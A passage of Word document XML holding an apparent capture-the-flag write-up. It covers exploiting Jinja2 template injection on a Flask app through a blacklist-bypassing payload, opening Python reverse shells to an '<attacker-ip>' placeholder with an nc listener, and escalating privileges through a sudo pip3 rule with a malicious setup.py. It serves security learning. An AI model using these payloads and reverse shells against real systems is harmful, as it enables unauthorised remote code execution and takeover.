              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F5496"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Why this confirms SSTI</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If the template engine were only displaying user input as plain text (i.e. the input was correctly escaped/treated as data), the response would show the literal characters “{{7*7}}”. Showing the computed result “49” proves the input was parsed and executed as template code, not displayed as text.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Exploitation: From SSTI to Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 The Filter Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A direct attempt to reach os.popen through the usual Jinja2 “sandbox escape” chain (typically via request.__class__.__mro__ or similar) was blocked with a generic error, indicating the application applies input filtering/sanitisation — likely a blacklist rejecting characters or substrings such as ., _, [, ], the words mro, base, or |join.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To defeat the filter, a well-known bypass technique documented in PayloadsAllTheThings / HackTricks was used: replacing blacklisted characters with Jinja2's attr() filter (which performs attribute access without using a literal dot) and encoding the double-underscore dunder names as hexadecimal escape sequences so the literal substring “__” never appears in the raw HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Filter-Bypassing RCE Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following payload walks from the Flask request object up to the Python builtins, imports the os module, and runs a shell command — all without using any of the blacklisted characters/strings directly:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /index{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">|attr('popen')('id')|attr('read')()}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response (truncated):</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">No results for indexuid=1001(web) gid=1001(web) groups=1001(web)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How the payload works, step by step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">request|attr('application') — reaches the Flask WSGI application object from the current request context, without writing request.application (dot access blocked by the filter).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|attr('\x5f\x5fglobals\x5f\x5f') — the hex sequence \x5f\x5f decodes to “__”; this retrieves the application function's __globals__ dictionary, i.e. the global namespace of the module it was defined in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f') — indexes into that globals dict to reach __builtins__, the module containing every built-in Python function and name, including __import__.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os') — calls the built-in __import__ function to import the os module dynamically, entirely through attribute/item access rather than an import statement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">|attr('popen')('id')|attr('read')() — finally calls os.popen('id').read(), executing the shell command id and returning its output, which is rendered directly into the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C00000" w:sz="4"/>
          <w:left w:val="single" w:color="C00000" w:sz="24"/>
          <w:bottom w:val="single" w:color="C00000" w:sz="4"/>
          <w:right w:val="single" w:color="C00000" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Security principle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">This is the classic Jinja2 sandbox-escape pattern: everything in Python is an object, and objects expose their class, their module globals, and eventually the builtins through attribute chains. A templating engine that evaluates arbitrary expressions from user input effectively hands the attacker a live Python REPL on the server, regardless of surface-level string blacklisting — blacklists inspect the raw payload text, not the semantic operations it performs, which is why hex-encoding dunder names defeats them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Achieving an Interactive Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With confirmed command execution, the next step was to escalate from single blind commands to a fully interactive shell. A standard Python reverse-shell one-liner was prepared, then hex-encoded (using CyberChef's “To Hex” recipe) so it could survive the same character filter and avoid URL/browser mangling — the payload was sent via Burp Suite Repeater rather than a browser address bar, to avoid unwanted auto-encoding of special characters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell payload (decoded, for reference):</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c 'import socket,subprocess,os;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s.connect(("&lt;attacker-ip&gt;",1234));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">p=subprocess.call(["/bin/sh","-i"]);'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivered inside the same SSTI RCE gadget (with the command hex-encoded) and a listener prepared beforehand:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -nvlp 1234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending the request returned a connection on the listener, providing an interactive shell as the low-privileged web user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os.dup2() redirects the process's standard input/output/error file descriptors onto the attacker's TCP socket, which is what turns a one-shot command execution primitive into a fully interactive shell session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hex-encoding the payload was essential here for two independent reasons: (1) bypassing the application's character blacklist, and (2) avoiding corruption of special shell characters (quotes, parentheses, semicolons) during transmission through a browser or URL parser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Privilege Escalation #1: web → system-adm (sudo pip3 misconfiguration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard local privilege-escalation enumeration begins with checking the current user's sudo rights:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">User web may run the following commands on vulnnet-dotpy:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    (system-adm) NOPASSWD: /usr/bin/pip3 install *</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This entry allows the “web” user to run pip3 install as the “system-adm” user, with no password prompt, and with an unrestricted wildcard argument. pip is a Python package manager — installing a local package directory executes that package's setup.py during the build process. This makes “pip3 install &lt;malicious-package&gt;” a well-known arbitrary-code-execution primitive whenever sudo grants it without restriction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A malicious package was staged in a world-writable location (/dev/shm), containing a setup.py that spawns a reverse shell:</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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># /dev/shm/setup.py</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">import socket,subprocess,os</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">s.connect(("&lt;attacker-ip&gt;", 4444))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">subprocess.call(["/bin/sh","-i"])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -u system-adm /usr/bin/pip3 install /dev/shm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With a listener running on port 4444, the pip3 install command triggered setup.py, which executed as system-adm, returning a shell as that user (user flag captured).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C00000" w:sz="4"/>
          <w:left w:val="single" w:color="C00000" w:sz="24"/>
          <w:bottom w:val="single" w:color="C00000" w:sz="4"/>
          <w:right w:val="single" w:color="C00000" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="100%"/>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
